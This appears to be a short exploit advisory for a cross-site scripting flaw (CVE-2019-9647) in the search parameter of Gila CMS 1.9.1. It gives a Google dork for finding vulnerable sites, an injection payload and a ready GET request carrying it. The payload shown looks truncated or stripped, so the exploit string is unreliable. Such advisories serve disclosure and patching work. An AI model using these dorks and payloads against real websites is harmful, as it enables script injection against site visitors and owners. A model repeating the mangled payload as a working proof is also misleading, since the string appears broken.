# Exploit Title: Gila CMS (search) Cross Site Scripting
# Google Dork: intext:"Powered By Gila CMS"
# Date: 11.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://gilacms.com
# Software Link: https://gilacms.com/packages/downloadRelease/1.9.1.zip
# Demo Site: https://gilacms.com/demo/
# Version: 1.9.1
# Tested on: Kali Linux
# CVE: CVE-2019-9647
# Vulnerable Parameter: search
# Payload: <--` --!>
# GET Request: http://localhost/?search=<--` --!>